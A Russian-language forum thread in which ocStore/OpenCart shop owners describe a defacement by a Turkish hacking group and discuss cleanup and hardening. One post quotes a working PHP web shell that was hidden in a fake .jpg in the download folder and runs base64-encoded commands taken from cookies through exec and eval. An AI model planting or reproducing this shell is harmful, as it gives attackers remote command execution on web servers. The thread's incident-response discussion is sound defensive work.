Перейти до вмісту
Пошук в
  • Детальніше...
Шукати результати, які ...
Шукати результати в ...

Срочно! Взлом или баран?


Einshtein

Recommended Posts

Вчера все было нормально, сегодня вижу в админке вот такое...

Изображение

на пользовательской части вот такое:

Изображение

Сейчас свяжусь с хостингом...бекапы как на зло 2х недельной давности, ПОделитесь идеями в дальнейших действиях!

Спасибо!

Ps забыл сказать что сайт работает на ocstore 1.5.1.3 (tmz.com.ua)

Надіслати
Поділитися на інших сайтах


Дал запрос хостеру (avahost.ua), благо у них вчерашний бекап остался...Надеюсь всё обойдётся. Но защитой ихней я крайне удивлен...при выборе хостинга акцент делал на тех поддержке и защите...поддержка нормальная, а вот с защитой уже косяк вышел :(

в описание категории они втулили вот такой код:

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-9">
<title>Hacked 1923Turk Grup - Emre5807 - Українці про підготовку необгрунтованими відео. Отримайте ваші ноги падає!</title>
<style type="text/css">
<!--
body {
background-color: #000000;
}
.style1 {
font-size: 16px;
font-weight: bold;
color: #FFFFFF;
font-family: Verdana, Arial, Helvetica, sans-serif;
}
.style2 {color: #FF0000}
.style3 {
color: #FFFFFF;
font-family: Verdana, Arial, Helvetica, sans-serif;
font-size: 14px;
font-weight: bold;
}
.style4 {font-size: 12px}
-->
</style></head>
<body>
<div align="center">
  <pre><img src="http://a1211.hizliresim.com/13/y/gf071.jpg" width="700" height="392" border="0">
<span class="style1">'' Ukrainians about preparing unfounded video. Get your foot falls! ''<br>'' <span class="style2">Hakkımızda asılsız video hazırlayan ukraynalılar. Ayağınızı denk alın!</span> ''<br>'' Українці про підготовку необгрунтованими відео. Отримайте ваші ноги падає! ''</span></pre>
	<tr>
		<td colspan="2">
			<img src="http://img25.imageshack.us/img25/6790/ozkuv05.gif" width="890" height="88" alt=""></td>
	</tr>
  <font size="5"
<div align="center"><font face="Book Antiqua"><strong>
<HR color=red SIZE=3>
  <font color="#F25951"> 1923Turk-Grup | Emre5807  </font>
<embed src="http://www.kurtlarvadisigladio.com/soundtrack.swf" width="0" height="0" loop="true" quality=high pluginspage="http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash" type="application/x-shockwave-flash"><br />
</body>
</html>

Только сейчас заметил что с площадки которую мы используем под несколько сайтов исчез полностью каталог с сайтом наших брендовых навигаторов и не открывается субдомен с другим сайтом.

Короче я домтрубашатал этих турков мать их

Официальный сайт этих рицидивистов

http://1923turk.com/
Вдруг кому понадобится
Надіслати
Поділитися на інших сайтах


судя по всему хакнули площадку на хосте (незнаю по фтп или както иначе как там хеккеры хакают). Суть в том что 2 сайта вообще удалили (правда бд оставили на месте), а на Опенкарте удалили все категории и создали свою с угрозами. Судя по всему до ОС они добрались через бд, так как невозможно удалить категории не отвязав от них товары, а товары все остались нетронутые.

Вчера хостер восстанавливал пол дня, так как сайт занимает 14гб то процесс затянулся, и под конец востановления резервной копии постоянно происходил какойто сбой. В итоге БД они востановили, а бекап просто залили в отдельную папку мне на прощадке и я ручками востанавливал все файлы до полуночи...

Короче я зол и истощен...а ещё мстителен и злопамятен...

Надіслати
Поділитися на інших сайтах


кстати пока на сайте небыло категорий - сайт летал как угорелый. Может в связи с этим есть какиенить идеи? сейчас оформлю отдельную тему

Надіслати
Поділитися на інших сайтах


присоединюсь к теме.

ocStore Version 1.5.3.1

сегодня обнаружил в папке download 2 файла

aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa.jpg.34fc0eb3c2764ad25f7547f5505a8b49

и index.html

в index.html ничего вроде страшного.

а вот jpg сначала идете картинка, а потом код:

<?php
	echo "$#@&nn";

	if(isset($_COOKIE['76027405']) && !empty($_COOKIE['76027405'])) {
		echo htmlentities((string) base64_decode($_COOKIE['76027405']),ENT_QUOTES);
		echo "<pre>";
		$outbuf="";$outstr="";exec(base64_decode($_COOKIE['76027405']),$outbuf);foreach($outbuf as $val) $outstr.=$val."rn";echo htmlentities($outstr);
	} elseif(isset($_COOKIE['26312595']) && !empty($_COOKIE['26312595'])) {
		echo htmlentities((string) base64_decode($_COOKIE['26312595']),ENT_QUOTES);
		echo "<pre>"; 
		eval((string) base64_decode($_COOKIE['26312595']));
	} elseif(isset($_COOKIE['13037085'])) {
		phpinfo();
	}

?>

вроде остальные файлы не затронуты.

взломали или попытка взлома?

Надіслати
Поділитися на інших сайтах


взломали или попытка взлома?

попытка взлома через известную уязвимость. наберите в адресной строке домен/download/aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa.jpg.34fc0eb3c2764ad25f7547f5505a8b49
Надіслати
Поділитися на інших сайтах

попытка взлома через известную уязвимость. наберите в адресной строке домен/download/aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa.jpg.34fc0eb3c2764ad25f7547f5505a8b49

набрал - показывается jpg

может удалить папку download? она вообще нужна?

Надіслати
Поділитися на інших сайтах


PHP код в файле изображения это код для взлома. Ищите срочно последствия его действий. Если вставят какой нибудь редирект на порносайт для мобильных устройств например, то через несколько месяцев такой работы ваш сайт может вылететь из индекса яндекса полностью. Яша воспримет ваш сайт как торговца рекламой и опустит в выдаче по самые некуда. Придется переезжать на другой домен. Проверяйте htaccess, index.php во фронте и в админке. Обращайте внимание на дополнительные инклуды в начале и конце файлов. Ищите фрагменты кода, закрытые обфускатом. Если обнаружили это в папке загрузки, все нужно удалять и проверять, как туда могли закинуть файл. Возможно это обусловлено настройками OC.

Да. Еще любопытства ради выведите на печать ту строку, которая передается на eval. Она у вас сидит в куках и она туда как то попала. Вопрос как?

Надіслати
Поділитися на інших сайтах


  • 3 months later...

Вчера на двух сайтах опять в папке download появились файлы:

типа

route.php.jpg.4cbd766fa1992fd76fc6858c8cb1e757

в папке download лежит .htaccess такого содержания.

<Files *.*>

Order Deny,Allow

Deny from all

</Files>

как еще бороться?

Надіслати
Поділитися на інших сайтах


попытка взлома через известную уязвимость. наберите в адресной строке домен/download/aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa.jpg.34fc0eb3c2764ad25f7547f5505a8b49

суть в том, что если отображается картинка - взлом не прокатил

Надіслати
Поділитися на інших сайтах

ну и совет продавцам, у которых опций в виде файла удалите метод upload из catalog/controller/product/product.php

Змінено користувачем freelancer
  • +1 2
Надіслати
Поділитися на інших сайтах

суть в том, что если отображается картинка - взлом не прокатил

первый раз когда увидел файл (aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa.jpg.34fc0eb3c2764ad25f7547f5505a8b49) в декабре отображалась картинка.

сегодня site.com/download/route.php.jpg.4cbd766fa1992fd76fc6858c8cb1e757 - выдает страница не найдена.

Надіслати
Поділитися на інших сайтах


если файл на месте, а вместо "картинки" получаете 404 (страница не найдена), скорее всего изменились настройки сервера. в худшую для вас сторону.

файлы с расширениями изображений должны отдаваться сервером только как изображения.

Надіслати
Поділитися на інших сайтах

Створіть аккаунт або увійдіть для коментування

Ви повинні бути користувачем, щоб залишити коментар

Створити обліковий запис

Зареєструйтеся для отримання облікового запису. Це просто!

Зареєструвати аккаунт

Вхід

Уже зареєстровані? Увійдіть тут.

Вхід зараз
  • Зараз на сторінці   0 користувачів

    • Ні користувачів, які переглядиють цю сторінку
×
×
  • Створити...

Important Information

На нашому сайті використовуються файли cookie і відбувається обробка деяких персональних даних користувачів, щоб поліпшити користувальницький інтерфейс. Щоб дізнатися для чого і які персональні дані ми обробляємо перейдіть за посиланням . Якщо Ви натиснете «Я даю згоду», це означає, що Ви розумієте і приймаєте всі умови, зазначені в цьому Повідомленні про конфіденційність.